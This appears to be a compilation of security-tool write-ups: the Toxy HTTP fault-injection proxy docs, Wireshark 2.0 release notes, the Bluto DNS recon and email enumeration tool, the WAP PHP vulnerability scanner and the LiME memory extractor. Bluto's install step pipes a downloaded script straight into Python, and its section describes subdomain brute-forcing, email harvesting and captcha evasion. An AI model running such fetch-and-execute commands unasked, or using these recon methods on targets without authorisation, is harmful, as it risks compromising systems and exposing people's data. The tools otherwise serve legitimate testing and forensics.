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Toxy - Hackable Http Proxy To Simulate Server Failure Scenarios And Network Conditions


Toxy is a fully programmatic and hackable HTTP proxy to simulate server failure scenarios and unexpected network conditions , built for node.js / io.js .

It was mainly designed for fuzzing/evil testing purposes, when toxy becomes particularly useful to cover fault tolerance and resiliency capabilities of a system, especially in disruption-tolerant networks and service-oriented architectures, where toxy may act as MitM proxy among services.

toxy allows you to plug in poisons, optionally filtered by rules, which essentially can intercept and alter the HTTP flow as you need, performing multiple evil actions in the middle of that process, such as limiting the bandwidth, delaying TCP packets, injecting network jitter latency or replying with a custom error or status code. It operates only at L7 (application level).

toxy can be fluently used programmatically or via HTTP API . It was built on top of rocky , a full-featured middleware-oriented HTTP proxy, and it's also pluggable in connect / express as standard middleware.

Requires node.js +0.12 or io.js +1.6

  • Full-featured HTTP/S proxy (backed by rocky and http-proxy )
  • Hackable and elegant programmatic API (inspired on connect/express)
  • Admin HTTP API for external management and dynamic configuration
  • Featured built-in router with nested configuration
  • Hierarchical and composable poisoning with rule based filtering
  • Hierarchical middleware layer (both global and route scopes)
  • Easily augmentable via middleware (based on connect/express middleware)
  • Supports both incoming and outgoing traffic poisoning
  • Built-in poisons (bandwidth, error, abort, latency, slow read...)
  • Rule-based poisoning (probabilistic, HTTP method, headers, body...)
  • Supports third-party poisons and rules
  • Built-in balancer and traffic interceptor via middleware
  • Inherits API and features from rocky
  • Compatible with connect/express (and most of their middleware)
  • Able to run as standalone HTTP proxy


Why toxy?
There're some other similar solutions like toxy in the market, but most of them do not provide a proper programmatic control and usually are not easy to hack, configure or are directly closed to extensibility.
Furthermore, the majority of the those solutions only operates at TCP L3 level stack instead of providing high-level abstractions to cover common requirements in the specific domain and nature of the HTTP L7 protocol, like toxy tries to provide
toxy brings a powerful hackable and extensible solution with a convenient abstraction, but without losing a proper low-level interface capabilities to deal with HTTP protocol primitives easily.
toxy was designed based on the rules of composition, simplicity and extensibility. Via its built-in hierarchical domain specific middleware layer you can easily augment toxy features to your own needs.

toxy introduces two directives: poisons and rules.
Poisons are the specific logic which infects an incoming or outgoing HTTP transaction (e.g: injecting a latency, replying with an error). One HTTP transaction can be poisoned by one or multiple poisons, and those poisons can be also configured to infect both global or route level traffic.
Rules are a kind of match validation filters that inspects an HTTP request/response in order to determine, given a certain rules, if the HTTP transaction should be poisioned or not (e.g: if headers matches, query params, method, body...). Rules can be reused and applied to both incoming and outgoing traffic flows, including different scopes: global, route or poison level.

How it works
↓  ( Incoming request )  ↓
↓ ||| ↓
↓ +-------------+ ↓
↓ | Toxy Router | ↓ -> Match the incoming request
↓ +-------------+ ↓
↓ ||| ↓
↓ +--------------------+ ↓
↓ | Incoming phase | ↓ -> The proxy receives the request from the client
↓ |~~~~~~~~~~~~~~~~~~~~| ↓
↓ | ---------------- | ↓
↓ | | Exec Rules | | ↓ -> Apply configured rules for the incoming request
↓ | ---------------- | ↓
↓ | ||| | ↓
↓ | ---------------- | ↓
↓ | | Exec Poisons | | ↓ -> If all rules passed, then poison the HTTP flow
↓ | ---------------- | ↓
↓ +~~~~~~~~~~~~~~~~~~~~+ ↓
↓ / \ ↓
↓ \ / ↓
↓ +--------------------+ ↓
↓ | HTTP dispatcher | ↓ -> Forward the HTTP traffic to the target server, either poisoned or not
↓ +--------------------+ ↓
↓ / \ ↓
↓ \ / ↓
↓ +--------------------+ ↓
↓ | Outgoing phase | ↓ -> Receives response from target server
↓ |~~~~~~~~~~~~~~~~~~~~| ↓
↓ | ---------------- | ↓
↓ | | Exec Rules | | ↓ -> Apply configured rules for the outgoing request
↓ | ---------------- | ↓
↓ | ||| | ↓
↓ | ---------------- | ↓
↓ | | Exec Poisons | | ↓ -> If all rules passed, then poison the HTTP flow before send it to the client
↓ | ---------------- | ↓
↓ +~~~~~~~~~~~~~~~~~~~~+ ↓
↓ ||| ↓
↓ ( Send to the client ) ↓ -> Finally, send the request to the client, either poisoned or not


npm install toxy

See examples directory for more use cases.
var toxy = require('toxy')
var poisons = toxy.poisons
var rules = toxy.rules

// Create a new toxy proxy
var proxy = toxy()

// Default server to forward incoming traffic

// Register global poisons and rules
.poison(poisons.latency({ jitter: 500 }))

// Register multiple routes
.poison(poisons.bandwidth({ bps: 1024 }))
.withRule(rules.headers({'Authorization': /^Bearer (.*)$/i }))

// Infect outgoing traffic only (after the server replied properly)
.outgoingPoison(poisons.bandwidth({ bps: 512 }))
.withRule(rules.timeThreshold({ duration: 1000, threshold: 1000 * 10 }))
.withRule(rules.responseStatus({ range: [ 200, 400 ] }))

.poison(poisons.rateLimit({ limit: 10, threshold: 1000 }))
.withRule(rules.method(['POST', 'PUT', 'DELETE']))
// And use a different more permissive poison for GET requests
.poison(poisons.rateLimit({ limit: 50, threshold: 1000 }))

// Handle the rest of the traffic
.poison(poisons.slowClose({ delay: 1000 }))
.poison(poisons.slowRead({ bps: 128 }))

console.log('Server listening on port:', 3000)
console.log('Test it:', 'http://localhost:3000/image/jpeg')

Poisons host specific logic which intercepts and mutates, wraps, modify and/or cancel an HTTP transaction in the proxy server. Poisons can be applied to incoming or outgoing, or even both traffic flows.
Poisons can be composed and reused for different HTTP scenarios. They are executed in FIFO order and asynchronously.

Poisoning scopes
toxy has a hierarchical design based on two different scopes: global and route .
Global scope points to all the incoming HTTP traffic received by the proxy server, regardless of the HTTP method or path.
Route scope points to any incoming traffic which matches with a specific HTTP verb and URI path.
Poisons can be plugged to both scopes, meaning you can operate with better accuracy and restrict the scope of the poisoning, for instance, you might wanna apply a bandwidth limit poisoning only to a certain routes, such as /download or /images .
See routes.js for a featured example.

Poisoning phases
Poisons can be plugged to incoming or outgoing traffic flows, or even both.
Incoming poisoning is applied when the traffic has been received by proxy but it has not been forwarded to the target server yet.
Outgoing poisoning refers to the traffic that has been forwarded to the target server and when proxy recieves the response from it, but that response has not been sent to the client yet.
This means, essentially, that you can plug in your poisons to infect the HTTP traffic before or after the request is forwarded to the target HTTP server or sent to the client.
This allows you apply a better and more accurated poisoning based on the request or server response. For instance, given the nature of some poisons, like inject error , you may want to enable it according to the target server response (e.g: some header is present or not).
See poison-phases.js for a featured example.

Built-in poisons

Name latency
Poisoning Phase incoming / outgoing
Reaches the server true
Infects the HTTP flow injecting a latency jitter in the response
Arguments :
  • options object
    • jitter number - Jitter value in miliseconds
    • max number - Random jitter maximum value
    • min number - Random jitter minimum value
toxy.poison(toxy.poisons.latency({ jitter: 1000 }))
// Or alternatively using a random value
toxy.poison(toxy.poisons.latency({ max: 1000, min: 100 }))

Inject response
Name inject
Poisoning Phase incoming / outgoing
Reaches the server false (only as incoming poison)
Injects a custom response, intercepting the request before sending it to the target server. Useful to inject errors originated in the server.
Arguments :
  • options object
    • code number - Response HTTP status code. Default 500
    • headers object - Optional headers to send
    • body mixed - Optional body data to send. It can be a buffer or string
    • encoding string - Body encoding. Default to utf8
code: 503,
body: '{"error": "toxy injected error"}',
headers: {'Content-Type': 'application/json'}

Name bandwidth
Poisoning Phase incoming / outgoing
Reaches the server true
Limits the amount of bytes sent over the network in outgoing HTTP traffic for a specific time frame.
This poison is basically an alias to throttle.
Arguments :
  • options object
    • bytes number - Amount of chunk of bytes to send. Default 1024
    • threshold number - Packets time frame in miliseconds. Default 1000
toxy.poison(toxy.poisons.bandwidth({ bytes: 512 }))

Rate limit
Name rateLimit
Poisoning Phase incoming / outgoing
Reaches the server true
Limits the amount of requests received by the proxy in a specific threshold time frame. Designed to test API limits. Exposes typical X-RateLimit-* headers.
Note that this is very simple rate limit implementation, indeed limits are stored in-memory, therefore are completely volalite. There're a bunch of featured and consistent rate limiter implementations in npm that you can plug in as poison. You might be also interested in token bucket algorithm.
Arguments :
  • options object
    • limit number - Total amount of requests. Default to 10
    • threshold number - Limit time frame in miliseconds. Default to 1000
    • message string - Optional error message when limit is reached.
    • code number - HTTP status code when limit is reached. Default to 429 .
toxy.poison(toxy.poisons.rateLimit({ limit: 5, threshold: 10 * 1000 }))

Slow read
Name rateLimit
Poisoning Phase incoming
Reaches the server true
Reads incoming payload data packets slowly. Only valid for non-GET request.
Arguments :
  • options object
    • chunk number - Packet chunk size in bytes. Default to 1024
    • threshold number - Limit threshold time frame in miliseconds. Default to 1000
toxy.poison(toxy.poisons.slowRead({ chunk: 2048, threshold: 1000 }))

Slow open
Name: slowOpen
Name slowOpen
Poisoning Phase incoming
Reaches the server true
Delays the HTTP connection ready state.
Arguments :
  • options object
    • delay number - Delay connection in miliseconds. Default to 1000
toxy.poison(toxy.poisons.slowOpen({ delay: 2000 }))

Slow close
Name slowClose
Poisoning Phase incoming / outgoing
Reaches the server true
Delays the HTTP connection close signal (EOF).
Arguments :
  • options object
    • delay number - Delay time in miliseconds. Default to 1000
toxy.poison(toxy.poisons.slowClose({ delay: 2000 }))

Name throttle
Poisoning Phase incoming / outgoing
Reaches the server true
Restricts the amount of packets sent over the network in a specific threshold time frame.
Arguments :
  • options object
    • chunk number - Packet chunk size in bytes. Default to 1024
    • delay object - Data chunk delay time frame in miliseconds. Default to 100
toxy.poison(toxy.poisons.throttle({ chunk: 2048, threshold: 1000 }))

Abort connection
Name abort
Poisoning Phase incoming / outgoing
Reaches the server false (only as incoming poison)
Aborts the TCP connection. From the low-level perspective, this will destroy the socket on the server, operating only at TCP level without sending any specific HTTP application level data.
Arguments :
  • options object
    • delay number - Aborts TCP connection after waiting the given miliseconds. Default to 0
    • next boolean - If true , the connection will be aborted if the target server takes more than the delay param time to reply. Default to false
    • error Error - Custom internal node.js error to use when destroying the socket. Default to null
// Basic connection abort
// Abort after a delay
// In this case, the socket will be closed if
// the target server takes more than
// 2 seconds to respond
toxy.poison(toxy.poisons.abort({ delay: 2000, next: true }))

Name timout
Poisoning Phase incoming / outgoing
Reaches the server true
Defines a response timeout. Useful when forward to potentially slow servers.
Arguments :
  • miliseconds number - Timeout limit in miliseconds

How to write poisons
Poisons are implemented as standalone middleware (like in connect/express).
Here's a simple example of a server latency poison:
var toxy = require('toxy')

function customLatency(delay) {
* We name the function since toxy uses it as identifier to get/disable/remove it in the future
return function customLatency(req, res, next) {
var timeout = setTimeout(clean, delay)
req.once('close', onClose)

function onClose() {
next('client connection closed')

function clean() {
req.removeListener('close', onClose)

var proxy = toxy()

// Register and enable the poison
You can optionally extend the build-in poisons with your own poisons:

// Then you can use it as a built-in poison
For featured real example, take a look to the built-in poisons implementation.

Rules are simple validation filters which inspects an incoming or outgoing HTTP traffic in order to determine, given a certain rules (e.g: matches the method, headers, query params, body...), if the current HTTP transaction should be poisoned or not, based on the resolution value of the rule.
Rules are useful to compose, decouple and reuse logic among different scenarios of poisoning. Rules can be applied to global, route or even poison scope, and it also applies to both phases of poisoning .
Rules are executed in FIFO order. Their evaluation logic is equivalent to Array#every() in JavaScript: all the rules must pass in order to proceed with the poisoning.

Built-in rules

Name probability
Poison Phase incoming / outgoing
Enables the rule by a random probabilistic. Useful for random poisoning.
Arguments :
  • percentage number - Percentage of filtering. Default 50
var rule = toxy.rules.probability(85)

Time threshold
Name timeThreshold
Poison Phase incoming / outgoing
Simple rule to enable poisons based on a specific time threshold and duration. For instance, you can enable a certain poisons during a specific amount of time (e.g: 1 second) within a time threshold (e.g: 1 minute).
Arguments :
  • options object
    • duration number - Enable time inverval in miliseconds. Default to 1000
    • threshold number - Time threshold in miliseconds to wait before re-enable the poisoning. Default to 10000
// Enable the poisoning only 100 miliseconds per each 10 seconds
// Enable poisoning during 1 second every minute
proxy.rule(toxy.rules.timeThreshold({ duration: 1000, period: 1000 * 60 }))

Name method
Poison Phase incoming / outgoing
Filters by HTTP method.
Arguments :
  • method string|array - Method or methods to filter.
var method = toxy.rules.method(['GET', 'POST'])

Content Type
Filters by content type header. It should be present
Arguments :
  • value string|regexp - Header value to match.
var rule = toxy.rules.contentType('application/json')

Name headers
Poison Phase incoming / outgoing
Filter by request headers.
Arguments :
  • headers object - Headers to match by key-value pair. value can be a string, regexp, boolean or function(headerValue, headerName) => boolean
var matchHeaders = {
'content-type': /^application/\json/i,
'server': true, // meaning it should be present,
'accept': function (value, key) {
return value.indexOf('text') !== -1

var rule = toxy.rules.headers(matchHeaders)

Response headers
Name responseHeaders
Poison Phase outgoing
Filter by response headers from target server. Same as headers rule, but evaluating the outgoing request.
Arguments :
  • headers object - Headers to match by key-value pair. value can be a string , regexp , boolean or function(headerValue, headerName) => boolean
var matchHeaders = {
'content-type': /^application/\json/i,
'server': true, // meaning it should be present,
'accept': function (value, key) {
return value.indexOf('text') !== -1

var rule = toxy.rules.responseHeaders(matchHeaders)

Name body
Poison Phase incoming / outgoing
Match incoming body payload by a given string , regexp or custom filter function .
This rule is pretty simple, so for complex body matching (e.g: validating against a JSON schema) you should probably write your own rule.
Arguments :
  • match string|regexp|function - Body content to match
  • limit string - Optional. Body limit in human size. E.g: 5mb
  • encoding string - Body encoding. Default to utf8
  • length number - Body length. Default taken from Content-Length header
var rule = toxy.rules.body('"hello":"world"')

// Or using a filter function returning a boolean
var rule = toxy.rules.body(function contains(body) {
return body.indexOf('hello') !== -1

Response body
Name responseBody
Poison Phase outgoing
Match outgoing body payload by a given string , regexp or custom filter function .
Arguments :
  • match string|regexp|function - Body content to match
  • encoding string - Body encoding. Default to utf8
  • length number - Body length. Default taken from Content-Length header
var rule = toxy.rules.responseBody('"hello":"world"')

// Or using a filter function returning a boolean
var rule = toxy.rules.responseBody(function contains(body) {
return body.indexOf('hello') !== -1

Response status
Name responseStatus
Poison Phase outgoing
Evaluates the response status from the target server. Only applicable to outgoing poisons.
Arguments :
  • range array - Pair of status code range to match. Default [200, 300] .
  • lower number - Compare status as lower than operation. Default to null .
  • higher number - Compare status as higher than operation. Default to null .
  • value number - Status code to match using a strict equality comparison. Default null .
  • include array - Unordered list of status codes to match. Useful to specify custom status. Default null
// Strict evaluation of the status code
// Using a range of valid status
toxy.rule(toxy.rules.responseBody([200, 204]))
// Using relational comparison
toxy.rule(toxy.rules.responseBody({ higher: 199, lower: 400 }))
// Custom unordered status code to match
toxy.rule(toxy.rules.responseBody({ include: [200, 204, 400, 404] }))

Third-party rules
List of available third-party rules provided by the community. PR are welcome.
  • IP - Enable/disable poisons based on the client IP address (supports CIDR, subnets, ranges...).

How to write rules
Rules are simple middleware functions that resolve asyncronously with a boolean value to determine if a given HTTP transaction should be ignored when poisoning.
Your rule must resolve with a boolean param calling the next(err, shouldIgnore) function in the middleware, passing a true value if the rule has not matches and should not apply the poisoning, and therefore continuing with the next middleware stack.
Here's an example of a simple rule matching the HTTP method to determine if:
var toxy = require('toxy')

function customMethodRule(matchMethod) {
* We name the function since it's used by toxy to identify the rule to get/disable/remove it in the future
return function customMethodRule(req, res, next) {
var shouldIgnore = req.method !== matchMethod
next(null, shouldIgnore)

var proxy = toxy()

// Register and enable the rule
.poison(/* ... */)
You can optionally extend the build-in rules with your own rules:

// Then you can use it as a built-in poison
For featured real examples, take a look to the built-in rules implementation

Programmatic API
toxy API is completely built on top the rocky API . In other words, you can use any of the methods, features and middleware layer natively provided by rocky .

toxy([ options ])
Create a new toxy proxy.
For supported options , please see rocky documentation
var toxy = require('toxy')

toxy({ forward: 'http://server.net', timeout: 30000 })


.poison(toxy.poisons.bandwidth({ bps: 1024 }))

.outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))



toxy#get(path, [ middleware... ])
Return: ToxyRoute
Register a new route for GET method.

toxy#post(path, [ middleware... ])
Return: ToxyRoute
Register a new route for POST method.

toxy#put(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PUT method.

toxy#patch(path, [ middleware... ])
Return: ToxyRoute

toxy#delete(path, [ middleware... ])
Return: ToxyRoute
Register a new route for DELETE method.

toxy#head(path, [ middleware... ])
Return: ToxyRoute
Register a new route for HEAD method.

toxy#all(path, [ middleware... ])
Return: ToxyRoute
Register a new route for any method.

toxy#poisons => Object
Exposes a map with the built-in poisons. Prototype alias to toxy.poisons

toxy#rules => Object
Exposes a map with the built-in poisons. Prototype alias to toxy.rules

Define a URL to forward the incoming traffic received by the proxy.

Forward to multiple servers balancing among them.
For more information, see the rocky docs

Define a new replay server. You can call this method multiple times to define multiple replay servers.
For more information, see the rocky docs

Plug in a custom middleware.
For more information, see the rocky docs .

Plug in a response outgoing traffic middleware.
For more information, see the rocky docs .

Plug in a replay traffic middleware.
For more information, see the rocky docs

Intercept incoming request body. Useful to modify it on the fly.
For more information, see the rocky docs

Intercept outgoing response body. Useful to modify it on the fly.
For more information, see the rocky docs

Return a standard middleware to use with connect/express.

Overwrite the Host header with a custom value. Similar to forwardHost option.

Redirect traffic to the given URL.

toxy#findRoute(routeIdOrPath, [ method ])
Find a route by ID or path and method.

Starts the built-in HTTP server, listening on a specific TCP port.

toxy#close([ callback ])
Closes the HTTP server.

Alias: usePoison , useIncomingPoison
Register a new poison to infect incoming traffic.

Alias: useOutgoingPoison , responsePoison
Register a new poison to infect outgoing traffic.

Alias: useRule
Register a new rule.

Aliases: poisonRule , poisonFilter
Apply a new rule for the latest registered poison.

Enable a poison by name identifier

Disable a poison by name identifier

Return: boolean
Remove poison by name identifier.

Return: boolean
Checks if a poison is enabled by name identifier.

Alias: disablePoisons
Disable all the registered poisons.

Return: Directive|null
Searchs and retrieves a registered poison in the stack by name identifier.

Return: Directive|null
Searchs and retrieves a registered incoming poison in the stack by name identifier.

Return: Directive|null
Searchs and retrieves a registered outgoing poison in the stack by name identifier.

Return: array<Directive>
Return an array of registered poisons.

Return: array<Directive>
Return an array of registered incoming poisons.

Return: array<Directive>
Return an array of registered outgoing poisons.

Alias: flushPoisons
Remove all the registered poisons.

Enable a rule by name identifier.

Disable a rule by name identifier.

Return: boolean
Remove a rule by name identifier.

Disable all the registered rules.

Return: boolean
Checks if the given rule is enabled by name identifier.

Return: Directive|null
Searchs and retrieves a registered rule in the stack by name identifier.

Return: array<Directive>
Returns and array with the registered rules wrapped as Directive .

Remove all the rules.

toxy.addPoison(name, fn)
Extend built-in poisons.

toxy.addRule(name, fn)
Extend built-in rules.

toxy.poisons => Object
Exposes a map with the built-in poisons.

toxy.rules => Object
Exposes a map with the built-in rules.

toxy.VERSION => String
Current toxy semantic version.

ToxyRoute exposes the same interface as Toxy global interface, it just adds some route level additional methods .
Further actions you perform againts the ToxyRoute API will only be applicable at route-level (nested). In other words: you already know the API.
This example will probably clarify possible doubts:
var toxy = require('toxy')
var proxy = toxy()

// Now using the global API
.poison(toxy.poisons.bandwidth({ bps: 1024 }))

// Now create a route
var route = proxy
.toPath('/bar') // Route-level API method
.host('server.net') // Route-level API method

// Now using the ToxyRoute interface
.poison(toxy.poisons.bandwidth({ bps: 512 }))

A convenient wrapper internally used for poisons and rules.
Normally you don't need to know this interface, but for hacking purposes or more low-level actions might be useful.

Return: boolean

Return: boolean

Return: boolean

Alias: filter

Return: function(req, res, next)

The toxy HTTP API follows the JSON API conventions, including resource based hypermedia linking.

For a featured use case, see the admin server example.
const toxy = require('toxy')

// Create the toxy admin server
var admin = toxy.admin({ cors: true })

// Create the toxy proxy
var proxy = toxy()

// Add the toxy instance to be managed by the admin server

// Then configure the proxy

.poison(toxy.poisons.bandwidth({ bps: 1024 }))

// Handle the rest of the traffic
.poison(toxy.poisons.bandwidth({ bps: 1024 * 5 }))

console.log('toxy proxy listening on port:', 3000)
console.log('toxy admin server listening on port:', 9000)
For more details about the admin programmatic API, see below .

The HTTP API can be protected to unauthorized clients. Authorized clients must define the API key token via API-Key or Authorization HTTP headers.
To enable it, you should simple pass the following options to toxy admin server:
const toxy = require('toxy')

const opts = { apiKey: 's3cr3t' }
var admin = toxy.admin(opts)

console.log('protected toxy admin server listening on port:', 9000)

Hierarchy :
  • Servers - Managed toxy instances
    • Rules - Globally applied rules
    • Poisons - Globally applied poisons
      • Rules - Poison-specific rules
    • Routes - List of configured routes
      • Route - Object for each specific route
        • Rules - Route-level registered rules
        • Poisons - Route-level registered poisons
          • Rules - Route-level poison-specific rules



GET /servers

GET /servers/:id


GET /servers/:id/rules

POST /servers/:id/rules
Accepts: application/json
Example payload:
"name": "method",
"options": "GET"

DELETE /servers/:id/rules

GET /servers/:id/rules/:id

DELETE /servers/:id/rules/:id


GET /servers/:id/poison

POST /servers/:id/poisons
Accepts: application/json
Example payload:
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }

DELETE /servers/:id/poisons

GET /servers/:id/poisons/:id

DELETE /servers/:id/poisons/:id

GET /servers/:id/poisons/:id/rules

POST /servers/:id/poisons/:id/rules
Accepts: application/json
Example payload:
"name": "method",
"options": "GET"

DELETE /servers/:id/poisons/:id/rules

GET /servers/:id/poisons/:id/rules/:id

DELETE /servers/:id/poisons/:id/rules/:id


GET /servers/:id/routes

POST /servers/:id/routes
Accepts: application/json
Example payload:
"path": "/foo", // Required
"method": "GET", // use ALL for all the methods
"forward": "http://my.server", // Optional custom forward server URL

DELETE /servers/:id/routes

GET /servers/:id/routes/:id

DELETE /servers/:id/routes/:id

Route rules

GET /servers/:id/routes/:id/rules

POST /servers/:id/routes/:id/rules
Accepts: application/json
Example payload:
"name": "method",
"options": "GET"

DELETE /servers/:id/routes/:id/rules

GET /servers/:id/routes/:id/rules/:id

DELETE /servers/:id/routes/:id/rules/:id

Route poisons

GET /servers/:id/routes/:id/poisons

POST /servers/:id/routes/:id/poisons
Accepts: application/json
Example payload:
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }

DELETE /servers/:id/routes/:id/poisons

GET /servers/:id/routes/:id/poisons/:id

DELETE /servers/:id/routes/:id/poisons/:id

GET /servers/:id/routes/:id/poisons/:id/rules

POST /servers/:id/routes/:id/poisons/:id/rules
Accepts: application/json
Example payload:
"name": "method",
"options": "GET"

DELETE /servers/:id/routes/:id/poisons/:id/rules

GET /servers/:id/routes/:id/poisons/:id/rules/:id

DELETE /servers/:id/routes/:id/poisons/:id/rules/:id

Programmatic API
The built-in HTTP admin server also provides a simple interface open to extensibility and hacking purposes. For instance, you can plug in additional middleware to the admin server, or register new routes.

toxy.admin([ opts ])
Returns: Admin
Supported options :
  • apiKey string - Optional API key to protect the server
  • port number - Optional. TCP port to listen
  • cors boolean - Enable CORS for web browser access
  • middleware array<function> - Plug in additional middleware
  • ssl object - Node.js HTTPS server TLS options .

Admin#listen([ port, host ])
Start listening on the network.

Manage a toxy server instance.

Find a toxy instance. Accepts toxy server ID or toxy instance.

Stop managing a toxy instance.

Register a middleware.

Register a param middleware.

Admin#get(path, [ ...middleware ])
Register a GET route.

Admin#post(path, [ ...middleware ])
Register a POST route.

Admin#put(path, [ ...middleware ])
Register a PUT route.

Admin#delete(path, [ ...middleware ])
Register a DELETE route.

Admin#patch(path, [ ...middleware ])
Register a PATCH route.

Admin#all(path, [ ...middleware ])
Register a route accepting any HTTP method.

Admin#middleware(req, res, next)
Middleware to plug in with connect/express.

Stop the server.

Wireshark v2.0 - The World’s Foremost Network Protocol Analyzer


Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Wireshark 2.0.0rc2 has been released. This is the second release candidate for Wireshark 2.0. Installers for Windows, OS X, and source code are now available.
The following features are new (or have been significantly updated) since version 2.0.0rc1:
  • For new installations on UN*X, the directory for user preferences is $HOME/.config/wireshark rather than $HOME/.wireshark. If that directory is absent, preferences will still be found and stored under $HOME/.wireshark.
  • Qt port:
    • The SIP Statistics dialog has been added.
    • You can now create filter expressions from the display filter toolbar.
    • Bugs in the UAT prefererences dialog has been fixed.
  • Several dissector and Qt UI crash bugs have been fixed.
  • Problems with the Mac OS X application bundle have been fixed.
The following features are new (or have been significantly updated) since version 1.99.9:
  • Qt port:
    • The LTE RLC Graph dialog has been added.
    • The LTE MAC Statistics dialog has been added.
    • The LTE RLC Statistics dialog has been added.
    • The IAX2 Analysis dialog has been added.
    • The Conversation Hash Tables dialog has been added.
    • The Dissector Tables dialog has been added.
    • The Supported Protocols dialog has been added.
    • You can now zoom the I/O and TCP Stream graph X and Y axes independently.
    • The RTP Player dialog has been added.
    • Several memory leaks have been fixed.

Changes in Wireshark 2.0

Capture options. Capture options have been simplified and consolidated. In 1.12 they are spread out in many places across several windows. In 2.0 they are in two places: the Capture Options dialog (Capture→Options or the “gear” icon in the toolbar) and the Manage Interfaces dialog, which you can open by pressing “Manage Interfaces” in the Capture Options dialog.

Streamlined preferences. Preferences windows usually aren’t something to get excited about and this is no exception, but it’s important to note that in the process of removing clutter some preferences have been removed from the main window. They’re still available in the “Advanced” preference section which lists every available preference item.

Translations. Thanks to the hard work of many contributors the new interface supports multiple languages. You can now select between Chinese, English, French, German, Italian, Japanese, and Polish in the “Appearance” preferences section. Many more translations are underway. You can see the status the translation efforts and help out with the effort at https://www.transifex.com/wireshark/wireshark/.

Related packets. As you scroll through the packet list you might notice little symbols pop up along its left edge. For example, you might see left and right arrows for DNS requests and Replies, or a check mark to denote an ACKed TCP packet. These are related packets. This exposes some plumbing we’ve had in place for a long time, but it’s now shown in the main window instead of buried deep in the packet detail tree.

Intelligent scrollbar. As you scroll through the packet list you might notice that the scroll bar itself looks odd. It now features a map of nearby packets, similar to the “minimap” available in many modern text editors. The number of packets shown in the map is the same as the number of physical vertical pixels in your scrollbar. The more pixels you have, the more packets you can see. In other words, if you use Wireshark regularly you now have a legitimate business case for a retina display.

Statistics dialogs. The dialogs under the Statistics and Telephony menus have seen many improvements. The backend code has been consolidated so that most of Wireshark’s statistics now share common internal logic. This in turn let us create common UI code with many workflow improvements and a much more consistent interface.

I/O Graph dialog. You can now graph as many items as you like and save graphs as PDF, PNG, JPEG, and BMP. Graph settings stay with your profile so you can customize them for multiple environments.

Follow Stream dialog. You can now switch between streams and search for text.

General dialogs. Many dialogs now have context-aware hints. For example the I/O Graph and Follow Stream dialogs will tell you which packet corresponds to the graph or stream data under your cursor. Most of them will stay open after you close a capture file so that you can compare statistics or graphs between captures.

Bluto - DNS Recon, DNS Zone Transfer, and Email Enumeration

BLUTO DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto now does email address enumeration based on the target domain, currently using Bing and Google search engines. It is configured in such a way to use a random User Agent: on each request and does a country look up to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas, however exsesive lookups will result in captchas (Bluto will warn you if any are identified).

Bluto requires various other dependencies. So to make things as easy as possible, pip is used for the installation. This does mean you will need to have pip installed prior to attempting the Bluto install.

Pip Install Instructions
Note: To test if pip is already installed execute.
  pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.
  curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions
(1) Once pip has successfully downloaded and installed, we can install Bluto:
  sudo pip install git+git://github.com/RandomStorm/Bluto

(2) You should now be able to execute 'bluto' from any working directory in any terminal.

Upgrade Instructions
(1) The upgrade process is as simple as;
  sudo pip install git+git://github.com/RandomStorm/Bluto --upgrade

WAP - Web Application Protection


WAP is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) with a low rate of false positives.

WAP detects and corrects the following vulnerabilities:
  • SQL Injection (SQLI)
  • Cross-site scripting (XSS)
  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)
  • Directory Traversal or Path Traversal (DT/PT)
  • Source Code Disclosure (SCD)
  • OS Command Injection (OSCI)
  • PHP Code Injection

This tool semantically analyses the source code. More precisely, it does taint analysis (data-flow analysis) to detect the input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted by entry points ($_GET, $_POST arrays) and to verify if they reach some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm if the vulnerabilities are real or false positives. At the end, the real vulnerabilities are corrected with the insertion of the fixes (small pieces of code) in the source code.
WAP is written in Java language and is constituted by three modules:

  • Code Analyzer: composed by the tree generator and taint analyzer. The tool has integrated a lexer and a parser generated by ANTLR, and based in a grammar and a tree grammar written to PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Sintatic Tree) to each PHP file. The taint analyzer performs the taint analysis navigating through the AST to detect potentials vulnerabilities.

  • False Positives Predictor: composed by a supervised trained data set with instances classified as being vulnerabilities and false positives and by the Logistic Regression machine learning algorithm. For each potential vulnerability detected by code analyzer, this module collects the presence of the attributes that define a false positive. Then, the Logistic Regression algorithm receives them and classifies the instance as being a false positive or not (real vulnerability).

  • Code Corrector: Each real vulnerability is removed by correction of its source code. This module for the type of vulnerability selects the fix that removes the vulnerability and signalizes the places in the source code where the fix will be inserted. Then, the code is corrected with the insertion of the fixes and new files are created.     

LiME - Linux Memory Extractor


A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android. This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.
LiME utilizes the insmod command to load the module, passing required arguments for its execution.
insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"

path (required): outfile ~ name of file to write to on local system (SD Card)
tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
padded ~ pads all non-System RAM ranges with 0s
lime ~ each range prepended with fixed-size header containing address space info

